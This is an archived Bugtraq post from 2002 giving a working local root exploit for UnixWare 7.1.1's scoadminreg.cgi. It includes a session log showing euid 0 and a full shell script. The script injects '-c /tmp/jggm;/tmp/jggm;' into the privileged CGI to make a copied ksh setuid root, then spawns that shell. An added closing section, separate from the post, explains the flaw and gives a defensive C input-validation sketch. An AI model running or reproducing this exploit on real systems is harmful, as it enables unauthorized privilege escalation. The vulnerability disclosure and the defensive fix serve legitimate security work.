Bugtraq mailing list archives

Unixware 7.1.1 scoadminreg.cgi local exploit


From: jGgM. <jggm () mail com>
Date: 20 Jan 2002 23:30:16 -0000



unixware:~> uname -a
UnixWare unixware 5 7.1.1 i386 x86at SCO UNIX_SVR5
unixware:~> id
uid=101(mearee) gid=1(other)
unixware:~> ./scoadminreg.sh 

jGgM root exploit
http://www.netemperor.com/

Mail: jggm () mail com

Manager: -c /tmp/jggm;/tmp/jggm;
ERROR: Cannot find a Webtop object associated with -c /tmp/jggm
ERROR: Could not add object  ()
RESULT: Error: Object ".../_ens/Org" already exists.
Location: /webtop/webtops/en_US/admin/scoadminregError.html

Success...
# id
uid=101(mearee) gid=1(other) euid=0(root)
# 

It can be attacked remotely...maybe... :))

-----------------------------------------------
Korean Security Forum.
http://www.forsecure.com
http://www.netemperor.com
-----------------------------------------------

Here is the file...

--------------------------------------------------------------
#!/bin/sh

CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi

#
#
#
#

echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/";
echo
echo "Mail: jggm () mail com"
echo

if [ ! -x $SCOADMIN ]; then
   echo "$SCOADMIN file not found"
   exit 2;
fi

cat >/tmp/jggm.c <<_EOF

main()
{
   setuid(0);
   setgid(0);
   chown("/tmp/jGgM_Shell", 0, 0);
   chmod("/tmp/jGgM_Shell", 04755);
}
_EOF

cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c

$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

rm -rf /tmp/jggm /tmp/jggm.c

/tmp/jGgM_Shell

# end of file..
-----------------------------------------------------------------
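
In the session above, the argument "-c /tmp/jggm;/tmp/jggm;" is handed to the privileged CGI and /tmp/jggm ends up running with euid 0. The following is an added example, not part of the original post and not SCO's code: a defensive sketch for a privileged helper, assuming the argument reached a shell unfiltered (the post does not show the CGI's source). The names manager_name_ok and run_helper and the 64-byte limit are hypothetical.

```c
/* Added example: input handling for a privileged CGI helper (hypothetical names). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist: letters, digits, '_', '.', '-'; no leading '-', so the value
 * can be read neither as a shell fragment nor as an option. */
int manager_name_ok(const char *s)
{
    size_t i, n;
    if (s == NULL) return 0;
    n = strlen(s);
    if (n == 0 || n > 64 || s[0] == '-') return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-') return 0;
    }
    return 1;
}

/* Run a helper with the value as one argv element and a fixed environment;
 * no shell parses the value. helper_path is a fixed absolute path chosen by
 * the caller (assumption). Returns the exit status, or -1 on reject/failure. */
int run_helper(const char *helper_path, const char *manager)
{
    pid_t pid;
    int status;
    char *envp[] = { "PATH=/usr/bin:/bin", NULL };
    if (!manager_name_ok(manager)) return -1;
    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { (char *)helper_path, (char *)manager, NULL };
        execve(helper_path, argv, envp);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *bad = "-c /tmp/jggm;/tmp/jggm;"; /* argument from the post */
    printf("%d %d\n", manager_name_ok(bad), manager_name_ok("printer_mgr"));
    return run_helper("/bin/echo", bad) == -1 ? 0 : 1; /* rejected before fork */
}
```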

